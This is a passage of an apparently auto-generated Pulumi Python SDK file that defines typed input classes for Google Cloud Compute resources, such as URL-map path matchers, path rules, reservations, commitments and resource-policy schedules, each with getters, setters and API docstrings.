:param pulumi.Input['HttpHeaderActionArgs'] header_action: Specifies changes to request and response headers that need to take effect for the selected backend service. HeaderAction specified here are applied after the matching HttpRouteRule HeaderAction and before the HeaderAction in the UrlMap HeaderAction is not supported for load balancers that have their loadBalancingScheme set to EXTERNAL. Not supported when the URL map is bound to a target gRPC proxy that has validateForProxyless field set to true.
:param pulumi.Input[str] name: The name to which this PathMatcher is referred by the HostRule.
:param pulumi.Input[Sequence[pulumi.Input['PathRuleArgs']]] path_rules: The list of path rules. Use this list instead of routeRules when routing based on simple path matching is all that's required. The order by which path rules are specified does not matter. Matches are always done on the longest-path-first basis. For example: a pathRule with a path /a/b/c/* will match before /a/b/* irrespective of the order in which those paths appear in this list. Within a given pathMatcher, only one of pathRules or routeRules must be set.
:param pulumi.Input[Sequence[pulumi.Input['HttpRouteRuleArgs']]] route_rules: The list of HTTP route rules. Use this list instead of pathRules when advanced route matching and routing actions are desired. routeRules are evaluated in order of priority, from the lowest to highest number. Within a given pathMatcher, you can set only one of pathRules or routeRules.
"""
if default_route_action is not None:
pulumi.set(__self__, "default_route_action", default_route_action)
if default_service is not None:
pulumi.set(__self__, "default_service", default_service)
if default_url_redirect is not None:
pulumi.set(__self__, "default_url_redirect", default_url_redirect)
if description is not None:
pulumi.set(__self__, "description", description)
if header_action is not None:
pulumi.set(__self__, "header_action", header_action)
if name is not None:
pulumi.set(__self__, "name", name)
if path_rules is not None:
pulumi.set(__self__, "path_rules", path_rules)
if route_rules is not None:
pulumi.set(__self__, "route_rules", route_rules)
@property
@pulumi.getter(name="defaultRouteAction")
def default_route_action(self) -> Optional[pulumi.Input['HttpRouteActionArgs']]:
"""
defaultRouteAction takes effect when none of the pathRules or routeRules match. The load balancer performs advanced routing actions, such as URL rewrites and header transformations, before forwarding the request to the selected backend. If defaultRouteAction specifies any weightedBackendServices, defaultService must not be set. Conversely if defaultService is set, defaultRouteAction cannot contain any weightedBackendServices. Only one of defaultRouteAction or defaultUrlRedirect must be set. UrlMaps for external HTTP(S) load balancers support only the urlRewrite action within a path matcher's defaultRouteAction.
"""
return pulumi.get(self, "default_route_action")
@default_route_action.setter
def default_route_action(self, value: Optional[pulumi.Input['HttpRouteActionArgs']]):
pulumi.set(self, "default_route_action", value)
@property
@pulumi.getter(name="defaultService")
def default_service(self) -> Optional[pulumi.Input[str]]:
"""
The full or partial URL to the BackendService resource. This URL is used if none of the pathRules or routeRules defined by this PathMatcher are matched. For example, the following are all valid URLs to a BackendService resource: - https://www.googleapis.com/compute/v1/projects/project /global/backendServices/backendService - compute/v1/projects/project/global/backendServices/backendService - global/backendServices/backendService If defaultRouteAction is also specified, advanced routing actions, such as URL rewrites, take effect before sending the request to the backend. However, if defaultService is specified, defaultRouteAction cannot contain any weightedBackendServices. Conversely, if defaultRouteAction specifies any weightedBackendServices, defaultService must not be specified. Only one of defaultService, defaultUrlRedirect , or defaultRouteAction.weightedBackendService must be set. Authorization requires one or more of the following Google IAM permissions on the specified resource default_service: - compute.backendBuckets.use - compute.backendServices.use
"""
return pulumi.get(self, "default_service")
@default_service.setter
def default_service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "default_service", value)
@property
@pulumi.getter(name="defaultUrlRedirect")
def default_url_redirect(self) -> Optional[pulumi.Input['HttpRedirectActionArgs']]:
"""
When none of the specified pathRules or routeRules match, the request is redirected to a URL specified by defaultUrlRedirect. If defaultUrlRedirect is specified, defaultService or defaultRouteAction must not be set. Not supported when the URL map is bound to a target gRPC proxy.
"""
return pulumi.get(self, "default_url_redirect")
@default_url_redirect.setter
def default_url_redirect(self, value: Optional[pulumi.Input['HttpRedirectActionArgs']]):
pulumi.set(self, "default_url_redirect", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description of this resource. Provide this property when you create the resource.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="headerAction")
def header_action(self) -> Optional[pulumi.Input['HttpHeaderActionArgs']]:
"""
Specifies changes to request and response headers that need to take effect for the selected backend service. HeaderAction specified here are applied after the matching HttpRouteRule HeaderAction and before the HeaderAction in the UrlMap HeaderAction is not supported for load balancers that have their loadBalancingScheme set to EXTERNAL. Not supported when the URL map is bound to a target gRPC proxy that has validateForProxyless field set to true.
"""
return pulumi.get(self, "header_action")
@header_action.setter
def header_action(self, value: Optional[pulumi.Input['HttpHeaderActionArgs']]):
pulumi.set(self, "header_action", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name to which this PathMatcher is referred by the HostRule.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="pathRules")
def path_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PathRuleArgs']]]]:
"""
The list of path rules. Use this list instead of routeRules when routing based on simple path matching is all that's required. The order by which path rules are specified does not matter. Matches are always done on the longest-path-first basis. For example: a pathRule with a path /a/b/c/* will match before /a/b/* irrespective of the order in which those paths appear in this list. Within a given pathMatcher, only one of pathRules or routeRules must be set.
"""
return pulumi.get(self, "path_rules")
@path_rules.setter
def path_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PathRuleArgs']]]]):
pulumi.set(self, "path_rules", value)
@property
@pulumi.getter(name="routeRules")
def route_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['HttpRouteRuleArgs']]]]:
"""
The list of HTTP route rules. Use this list instead of pathRules when advanced route matching and routing actions are desired. routeRules are evaluated in order of priority, from the lowest to highest number. Within a given pathMatcher, you can set only one of pathRules or routeRules.
"""
return pulumi.get(self, "route_rules")
@route_rules.setter
def route_rules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['HttpRouteRuleArgs']]]]):
pulumi.set(self, "route_rules", value)
@pulumi.input_type
class PathRuleArgs:
def __init__(__self__, *,
paths: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
route_action: Optional[pulumi.Input['HttpRouteActionArgs']] = None,
service: Optional[pulumi.Input[str]] = None,
url_redirect: Optional[pulumi.Input['HttpRedirectActionArgs']] = None):
"""
A path-matching rule for a URL. If matched, will use the specified BackendService to handle the traffic arriving at this URL.
:param pulumi.Input[Sequence[pulumi.Input[str]]] paths: The list of path patterns to match. Each must start with / and the only place a * is allowed is at the end following a /. The string fed to the path matcher does not include any text after the first ? or #, and those chars are not allowed here.
:param pulumi.Input['HttpRouteActionArgs'] route_action: In response to a matching path, the load balancer performs advanced routing actions, such as URL rewrites and header transformations, before forwarding the request to the selected backend. If routeAction specifies any weightedBackendServices, service must not be set. Conversely if service is set, routeAction cannot contain any weightedBackendServices. Only one of routeAction or urlRedirect must be set. URL maps for external HTTP(S) load balancers support only the urlRewrite action within a path rule's routeAction.
:param pulumi.Input[str] service: The full or partial URL of the backend service resource to which traffic is directed if this rule is matched. If routeAction is also specified, advanced routing actions, such as URL rewrites, take effect before sending the request to the backend. However, if service is specified, routeAction cannot contain any weightedBackendServices. Conversely, if routeAction specifies any weightedBackendServices, service must not be specified. Only one of urlRedirect, service or routeAction.weightedBackendService must be set.
:param pulumi.Input['HttpRedirectActionArgs'] url_redirect: When a path pattern is matched, the request is redirected to a URL specified by urlRedirect. If urlRedirect is specified, service or routeAction must not be set. Not supported when the URL map is bound to a target gRPC proxy.
"""
if paths is not None:
pulumi.set(__self__, "paths", paths)
if route_action is not None:
pulumi.set(__self__, "route_action", route_action)
if service is not None:
pulumi.set(__self__, "service", service)
if url_redirect is not None:
pulumi.set(__self__, "url_redirect", url_redirect)
@property
@pulumi.getter
def paths(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The list of path patterns to match. Each must start with / and the only place a * is allowed is at the end following a /. The string fed to the path matcher does not include any text after the first ? or #, and those chars are not allowed here.
"""
return pulumi.get(self, "paths")
@paths.setter
def paths(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "paths", value)
@property
@pulumi.getter(name="routeAction")
def route_action(self) -> Optional[pulumi.Input['HttpRouteActionArgs']]:
"""
In response to a matching path, the load balancer performs advanced routing actions, such as URL rewrites and header transformations, before forwarding the request to the selected backend. If routeAction specifies any weightedBackendServices, service must not be set. Conversely if service is set, routeAction cannot contain any weightedBackendServices. Only one of routeAction or urlRedirect must be set. URL maps for external HTTP(S) load balancers support only the urlRewrite action within a path rule's routeAction.
"""
return pulumi.get(self, "route_action")
@route_action.setter
def route_action(self, value: Optional[pulumi.Input['HttpRouteActionArgs']]):
pulumi.set(self, "route_action", value)
@property
@pulumi.getter
def service(self) -> Optional[pulumi.Input[str]]:
"""
The full or partial URL of the backend service resource to which traffic is directed if this rule is matched. If routeAction is also specified, advanced routing actions, such as URL rewrites, take effect before sending the request to the backend. However, if service is specified, routeAction cannot contain any weightedBackendServices. Conversely, if routeAction specifies any weightedBackendServices, service must not be specified. Only one of urlRedirect, service or routeAction.weightedBackendService must be set.
"""
return pulumi.get(self, "service")
@service.setter
def service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service", value)
@property
@pulumi.getter(name="urlRedirect")
def url_redirect(self) -> Optional[pulumi.Input['HttpRedirectActionArgs']]:
"""
When a path pattern is matched, the request is redirected to a URL specified by urlRedirect. If urlRedirect is specified, service or routeAction must not be set. Not supported when the URL map is bound to a target gRPC proxy.
"""
return pulumi.get(self, "url_redirect")
@url_redirect.setter
def url_redirect(self, value: Optional[pulumi.Input['HttpRedirectActionArgs']]):
pulumi.set(self, "url_redirect", value)
@pulumi.input_type
class PublicDelegatedPrefixPublicDelegatedSubPrefixArgs:
def __init__(__self__, *,
delegatee_project: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
ip_cidr_range: Optional[pulumi.Input[str]] = None,
is_address: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
Represents a sub PublicDelegatedPrefix.
:param pulumi.Input[str] delegatee_project: Name of the project scoping this PublicDelegatedSubPrefix.
:param pulumi.Input[str] description: An optional description of this resource. Provide this property when you create the resource.
:param pulumi.Input[str] ip_cidr_range: The IPv4 address range, in CIDR format, represented by this sub public delegated prefix.
:param pulumi.Input[bool] is_address: Whether the sub prefix is delegated to create Address resources in the delegatee project.
:param pulumi.Input[str] name: The name of the sub public delegated prefix.
"""
if delegatee_project is not None:
pulumi.set(__self__, "delegatee_project", delegatee_project)
if description is not None:
pulumi.set(__self__, "description", description)
if ip_cidr_range is not None:
pulumi.set(__self__, "ip_cidr_range", ip_cidr_range)
if is_address is not None:
pulumi.set(__self__, "is_address", is_address)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="delegateeProject")
def delegatee_project(self) -> Optional[pulumi.Input[str]]:
"""
Name of the project scoping this PublicDelegatedSubPrefix.
"""
return pulumi.get(self, "delegatee_project")
@delegatee_project.setter
def delegatee_project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "delegatee_project", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description of this resource. Provide this property when you create the resource.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="ipCidrRange")
def ip_cidr_range(self) -> Optional[pulumi.Input[str]]:
"""
The IPv4 address range, in CIDR format, represented by this sub public delegated prefix.
"""
return pulumi.get(self, "ip_cidr_range")
@ip_cidr_range.setter
def ip_cidr_range(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_cidr_range", value)
@property
@pulumi.getter(name="isAddress")
def is_address(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the sub prefix is delegated to create Address resources in the delegatee project.
"""
return pulumi.get(self, "is_address")
@is_address.setter
def is_address(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_address", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the sub public delegated prefix.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class RequestMirrorPolicyArgs:
def __init__(__self__, *,
backend_service: Optional[pulumi.Input[str]] = None):
"""
A policy that specifies how requests intended for the route's backends are shadowed to a separate mirrored backend service. The load balancer doesn't wait for responses from the shadow service. Before sending traffic to the shadow service, the host or authority header is suffixed with -shadow.
:param pulumi.Input[str] backend_service: The full or partial URL to the BackendService resource being mirrored to.
"""
if backend_service is not None:
pulumi.set(__self__, "backend_service", backend_service)
@property
@pulumi.getter(name="backendService")
def backend_service(self) -> Optional[pulumi.Input[str]]:
"""
The full or partial URL to the BackendService resource being mirrored to.
"""
return pulumi.get(self, "backend_service")
@backend_service.setter
def backend_service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "backend_service", value)
@pulumi.input_type
class ReservationAffinityArgs:
def __init__(__self__, *,
consume_reservation_type: Optional[pulumi.Input['ReservationAffinityConsumeReservationType']] = None,
key: Optional[pulumi.Input[str]] = None,
values: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Specifies the reservations that this instance can consume from.
:param pulumi.Input['ReservationAffinityConsumeReservationType'] consume_reservation_type: Specifies the type of reservation from which this instance can consume resources: ANY_RESERVATION (default), SPECIFIC_RESERVATION, or NO_RESERVATION. See Consuming reserved instances for examples.
:param pulumi.Input[str] key: Corresponds to the label key of a reservation resource. To target a SPECIFIC_RESERVATION by name, specify googleapis.com/reservation-name as the key and specify the name of your reservation as its value.
:param pulumi.Input[Sequence[pulumi.Input[str]]] values: Corresponds to the label values of a reservation resource. This can be either a name to a reservation in the same project or "projects/different-project/reservations/some-reservation-name" to target a shared reservation in the same zone but in a different project.
"""
if consume_reservation_type is not None:
pulumi.set(__self__, "consume_reservation_type", consume_reservation_type)
if key is not None:
pulumi.set(__self__, "key", key)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter(name="consumeReservationType")
def consume_reservation_type(self) -> Optional[pulumi.Input['ReservationAffinityConsumeReservationType']]:
"""
Specifies the type of reservation from which this instance can consume resources: ANY_RESERVATION (default), SPECIFIC_RESERVATION, or NO_RESERVATION. See Consuming reserved instances for examples.
"""
return pulumi.get(self, "consume_reservation_type")
@consume_reservation_type.setter
def consume_reservation_type(self, value: Optional[pulumi.Input['ReservationAffinityConsumeReservationType']]):
pulumi.set(self, "consume_reservation_type", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
Corresponds to the label key of a reservation resource. To target a SPECIFIC_RESERVATION by name, specify googleapis.com/reservation-name as the key and specify the name of your reservation as its value.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Corresponds to the label values of a reservation resource. This can be either a name to a reservation in the same project or "projects/different-project/reservations/some-reservation-name" to target a shared reservation in the same zone but in a different project.
"""
return pulumi.get(self, "values")
@values.setter
def values(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "values", value)
@pulumi.input_type
class ReservationArgs:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
share_settings: Optional[pulumi.Input['ShareSettingsArgs']] = None,
specific_reservation: Optional[pulumi.Input['AllocationSpecificSKUReservationArgs']] = None,
specific_reservation_required: Optional[pulumi.Input[bool]] = None,
zone: Optional[pulumi.Input[str]] = None):
"""
Represents a reservation resource. A reservation ensures that capacity is held in a specific zone even if the reserved VMs are not running. For more information, read Reserving zonal resources.
:param pulumi.Input[str] description: An optional description of this resource. Provide this property when you create the resource.
:param pulumi.Input[str] name: The name of the resource, provided by the client when initially creating the resource. The resource name must be 1-63 characters long, and comply with RFC1035. Specifically, the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the first character must be a lowercase letter, and all following characters must be a dash, lowercase letter, or digit, except the last character, which cannot be a dash.
:param pulumi.Input['ShareSettingsArgs'] share_settings: Share-settings for shared-reservation
:param pulumi.Input['AllocationSpecificSKUReservationArgs'] specific_reservation: Reservation for instances with specific machine shapes.
:param pulumi.Input[bool] specific_reservation_required: Indicates whether the reservation can be consumed by VMs with affinity for "any" reservation. If the field is set, then only VMs that target the reservation by name can consume from this reservation.
:param pulumi.Input[str] zone: Zone in which the reservation resides. A zone must be provided if the reservation is created within a commitment.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if name is not None:
pulumi.set(__self__, "name", name)
if share_settings is not None:
pulumi.set(__self__, "share_settings", share_settings)
if specific_reservation is not None:
pulumi.set(__self__, "specific_reservation", specific_reservation)
if specific_reservation_required is not None:
pulumi.set(__self__, "specific_reservation_required", specific_reservation_required)
if zone is not None:
pulumi.set(__self__, "zone", zone)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description of this resource. Provide this property when you create the resource.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource, provided by the client when initially creating the resource. The resource name must be 1-63 characters long, and comply with RFC1035. Specifically, the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?` which means the first character must be a lowercase letter, and all following characters must be a dash, lowercase letter, or digit, except the last character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="shareSettings")
def share_settings(self) -> Optional[pulumi.Input['ShareSettingsArgs']]:
"""
Share-settings for shared-reservation
"""
return pulumi.get(self, "share_settings")
@share_settings.setter
def share_settings(self, value: Optional[pulumi.Input['ShareSettingsArgs']]):
pulumi.set(self, "share_settings", value)
@property
@pulumi.getter(name="specificReservation")
def specific_reservation(self) -> Optional[pulumi.Input['AllocationSpecificSKUReservationArgs']]:
"""
Reservation for instances with specific machine shapes.
"""
return pulumi.get(self, "specific_reservation")
@specific_reservation.setter
def specific_reservation(self, value: Optional[pulumi.Input['AllocationSpecificSKUReservationArgs']]):
pulumi.set(self, "specific_reservation", value)
@property
@pulumi.getter(name="specificReservationRequired")
def specific_reservation_required(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether the reservation can be consumed by VMs with affinity for "any" reservation. If the field is set, then only VMs that target the reservation by name can consume from this reservation.
"""
return pulumi.get(self, "specific_reservation_required")
@specific_reservation_required.setter
def specific_reservation_required(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "specific_reservation_required", value)
@property
@pulumi.getter
def zone(self) -> Optional[pulumi.Input[str]]:
"""
Zone in which the reservation resides. A zone must be provided if the reservation is created within a commitment.
"""
return pulumi.get(self, "zone")
@zone.setter
def zone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zone", value)
@pulumi.input_type
class ResourceCommitmentArgs:
def __init__(__self__, *,
accelerator_type: Optional[pulumi.Input[str]] = None,
amount: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input['ResourceCommitmentType']] = None):
"""
Commitment for a particular resource (a Commitment is composed of one or more of these).
:param pulumi.Input[str] accelerator_type: Name of the accelerator type resource. Applicable only when the type is ACCELERATOR.
:param pulumi.Input[str] amount: The amount of the resource purchased (in a type-dependent unit, such as bytes). For vCPUs, this can just be an integer. For memory, this must be provided in MB. Memory must be a multiple of 256 MB, with up to 6.5GB of memory per every vCPU.
:param pulumi.Input['ResourceCommitmentType'] type: Type of resource for which this commitment applies. Possible values are VCPU and MEMORY
"""
if accelerator_type is not None:
pulumi.set(__self__, "accelerator_type", accelerator_type)
if amount is not None:
pulumi.set(__self__, "amount", amount)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="acceleratorType")
def accelerator_type(self) -> Optional[pulumi.Input[str]]:
"""
Name of the accelerator type resource. Applicable only when the type is ACCELERATOR.
"""
return pulumi.get(self, "accelerator_type")
@accelerator_type.setter
def accelerator_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "accelerator_type", value)
@property
@pulumi.getter
def amount(self) -> Optional[pulumi.Input[str]]:
"""
The amount of the resource purchased (in a type-dependent unit, such as bytes). For vCPUs, this can just be an integer. For memory, this must be provided in MB. Memory must be a multiple of 256 MB, with up to 6.5GB of memory per every vCPU.
"""
return pulumi.get(self, "amount")
@amount.setter
def amount(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "amount", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input['ResourceCommitmentType']]:
"""
Type of resource for which this commitment applies. Possible values are VCPU and MEMORY
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input['ResourceCommitmentType']]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ResourcePolicyDailyCycleArgs:
def __init__(__self__, *,
days_in_cycle: Optional[pulumi.Input[int]] = None,
start_time: Optional[pulumi.Input[str]] = None):
"""
Time window specified for daily operations.
:param pulumi.Input[int] days_in_cycle: Defines a schedule with units measured in months. The value determines how many months pass between the start of each cycle.
:param pulumi.Input[str] start_time: Start time of the window. This must be in UTC format that resolves to one of 00:00, 04:00, 08:00, 12:00, 16:00, or 20:00. For example, both 13:00-5 and 08:00 are valid.
"""
if days_in_cycle is not None:
pulumi.set(__self__, "days_in_cycle", days_in_cycle)
if start_time is not None:
pulumi.set(__self__, "start_time", start_time)
@property
@pulumi.getter(name="daysInCycle")
def days_in_cycle(self) -> Optional[pulumi.Input[int]]:
"""
Defines a schedule with units measured in months. The value determines how many months pass between the start of each cycle.
"""
return pulumi.get(self, "days_in_cycle")
@days_in_cycle.setter
def days_in_cycle(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "days_in_cycle", value)
@property
@pulumi.getter(name="startTime")
def start_time(self) -> Optional[pulumi.Input[str]]:
"""
Start time of the window. This must be in UTC format that resolves to one of 00:00, 04:00, 08:00, 12:00, 16:00, or 20:00. For example, both 13:00-5 and 08:00 are valid.
"""
return pulumi.get(self, "start_time")
@start_time.setter
def start_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "start_time", value)
@pulumi.input_type
class ResourcePolicyGroupPlacementPolicyArgs:
def __init__(__self__, *,
availability_domain_count: Optional[pulumi.Input[int]] = None,
collocation: Optional[pulumi.Input['ResourcePolicyGroupPlacementPolicyCollocation']] = None,
vm_count: Optional[pulumi.Input[int]] = None):
"""
A GroupPlacementPolicy specifies resource placement configuration. It specifies the failure bucket separation as well as network locality
:param pulumi.Input[int] availability_domain_count: The number of availability domains instances will be spread across. If two instances are in different availability domain, they will not be put in the same low latency network
:param pulumi.Input['ResourcePolicyGroupPlacementPolicyCollocation'] collocation: Specifies network collocation
:param pulumi.Input[int] vm_count: Number of vms in this placement group
"""
if availability_domain_count is not None:
pulumi.set(__self__, "availability_domain_count", availability_domain_count)
if collocation is not None:
pulumi.set(__self__, "collocation", collocation)
if vm_count is not None:
pulumi.set(__self__, "vm_count", vm_count)
@property
@pulumi.getter(name="availabilityDomainCount")
def availability_domain_count(self) -> Optional[pulumi.Input[int]]:
"""
The number of availability domains instances will be spread across. If two instances are in different availability domain, they will not be put in the same low latency network
"""
return pulumi.get(self, "availability_domain_count")
@availability_domain_count.setter
def availability_domain_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "availability_domain_count", value)
@property
@pulumi.getter
def collocation(self) -> Optional[pulumi.Input['ResourcePolicyGroupPlacementPolicyCollocation']]:
"""
Specifies network collocation
"""
return pulumi.get(self, "collocation")
@collocation.setter
def collocation(self, value: Optional[pulumi.Input['ResourcePolicyGroupPlacementPolicyCollocation']]):
pulumi.set(self, "collocation", value)
@property
@pulumi.getter(name="vmCount")
def vm_count(self) -> Optional[pulumi.Input[int]]:
"""
Number of vms in this placement group
"""
return pulumi.get(self, "vm_count")
@vm_count.setter
def vm_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "vm_count", value)
@pulumi.input_type
class ResourcePolicyHourlyCycleArgs:
def __init__(__self__, *,
hours_in_cycle: Optional[pulumi.Input[int]] = None,
start_time: Optional[pulumi.Input[str]] = None):
"""
Time window specified for hourly operations.
:param pulumi.Input[int] hours_in_cycle: Defines a schedule with units measured in hours. The value determines how many hours pass between the start of each cycle.
:param pulumi.Input[str] start_time: Time within the window to start the operations. It must be in format "HH:MM", where HH : [00-23] and MM : [00-00] GMT.
"""
if hours_in_cycle is not None:
pulumi.set(__self__, "hours_in_cycle", hours_in_cycle)
if start_time is not None:
pulumi.set(__self__, "start_time", start_time)
@property
@pulumi.getter(name="hoursInCycle")
def hours_in_cycle(self) -> Optional[pulumi.Input[int]]:
"""
Defines a schedule with units measured in hours. The value determines how many hours pass between the start of each cycle.
"""
return pulumi.get(self, "hours_in_cycle")
@hours_in_cycle.setter
def hours_in_cycle(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "hours_in_cycle", value)
@property
@pulumi.getter(name="startTime")
def start_time(self) -> Optional[pulumi.Input[str]]:
"""
Time within the window to start the operations. It must be in format "HH:MM", where HH : [00-23] and MM : [00-00] GMT.
"""
return pulumi.get(self, "start_time")
@start_time.setter
def start_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "start_time", value)
@pulumi.input_type
class ResourcePolicyInstanceSchedulePolicyScheduleArgs:
def __init__(__self__, *,
schedule: Optional[pulumi.Input[str]] = None):
"""
Schedule for an instance operation.
:param pulumi.Input[str] schedule: Specifies the frequency for the operation, using the unix-cron format.
"""
if schedule is not None:
pulumi.set(__self__, "schedule", schedule)
@property
@pulumi.getter
def schedule(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the frequency for the operation, using the unix-cron format.
"""
return pulumi.get(self, "schedule")
@schedule.setter
def schedule(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "schedule", value)
@pulumi.input_type
class ResourcePolicyInstanceSchedulePolicyArgs:
def __init__(__self__, *,
expiration_time: Optional[pulumi.Input[str]] = None,
start_time: Optional[pulumi.Input[str]] = None,
time_zone: Optional[pulumi.Input[str]] = None,
vm_start_schedule: Optional[pulumi.Input['ResourcePolicyInstanceSchedulePolicyScheduleArgs']] = None,
vm_stop_schedule: Optional[pulumi.Input['ResourcePolicyInstanceSchedulePolicyScheduleArgs']] = None):
"""
An InstanceSchedulePolicy specifies when and how frequent certain operations are performed on the instance.
:param pulumi.Input[str] expiration_time: The expiration time of the schedule. The timestamp is an RFC3339 string.
:param pulumi.Input[str] start_time: The start time of the schedule. The timestamp is an RFC3339 string.
:param pulumi.Input[str] time_zone: Specifies the time zone to be used in interpreting Schedule.schedule. The value of this field must be a time zone name from the tz database: http://en.wikipedia.org/wiki/Tz_database.
:param pulumi.Input['ResourcePolicyInstanceSchedulePolicyScheduleArgs'] vm_start_schedule: Specifies the schedule for starting instances.
:param pulumi.Input['ResourcePolicyInstanceSchedulePolicyScheduleArgs'] vm_stop_schedule: Specifies the schedule for stopping instances.
"""
if expiration_time is not None:
pulumi.set(__self__, "expiration_time", expiration_time)
if start_time is not None:
pulumi.set(__self__, "start_time", start_time)
if time_zone is not None:
pulumi.set(__self__, "time_zone", time_zone)
if vm_start_schedule is not None:
pulumi.set(__self__, "vm_start_schedule", vm_start_schedule)
if vm_stop_schedule is not None:
pulumi.set(__self__, "vm_stop_schedule", vm_stop_schedule)
@property
@pulumi.getter(name="expirationTime")
def expiration_time(self) -> Optional[pulumi.Input[str]]:
"""
The expiration time of the schedule. The timestamp is an RFC3339 string.
"""
return pulumi.get(self, "expiration_time")
@expiration_time.setter
def expiration_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "expiration_time", value)
@property
@pulumi.getter(name="startTime")
def start_time(self) -> Optional[pulumi.Input[str]]:
"""
The start time of the schedule. The timestamp is an RFC3339 string.
"""
return pulumi.get(self, "start_time")
@start_time.setter
def start_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "start_time", value)
@property
@pulumi.getter(name="timeZone")
def time_zone(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the time zone to be used in interpreting Schedule.schedule. The value of this field must be a time zone name from the tz database: http://en.wikipedia.org/wiki/Tz_database.
"""
return pulumi.get(self, "time_zone")
@time_zone.setter
def time_zone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_zone", value)
@property
@pulumi.getter(name="vmStartSchedule")
def vm_start_schedule(self) -> Optional[pulumi.Input['ResourcePolicyInstanceSchedulePolicyScheduleArgs']]:
"""
Specifies the schedule for starting instances.
"""
return pulumi.get(self, "vm_start_schedule")
@vm_start_schedule.setter
def vm_start_schedule(self, value: Optional[pulumi.Input['ResourcePolicyInstanceSchedulePolicyScheduleArgs']]):
pulumi.set(self, "vm_start_schedule", value)
@property
@pulumi.getter(name="vmStopSchedule")
def vm_stop_schedule(self) -> Optional[pulumi.Input['ResourcePolicyInstanceSchedulePolicyScheduleArgs']]:
"""
Specifies the schedule for stopping instances.
"""
return pulumi.get(self, "vm_stop_schedule")
@vm_stop_schedule.setter
def vm_stop_schedule(self, value: Optional[pulumi.Input['ResourcePolicyInstanceSchedulePolicyScheduleArgs']]):
pulumi.set(self, "vm_stop_schedule", value)
@pulumi.input_type
class ResourcePolicySnapshotSchedulePolicyRetentionPolicyArgs:
def __init__(__self__, *,
max_retention_days: Optional[pulumi.Input[int]] = None,
on_source_disk_delete: Optional[pulumi.Input['ResourcePolicySnapshotSchedulePolicyRetentionPolicyOnSourceDiskDelete']] = None):
"""
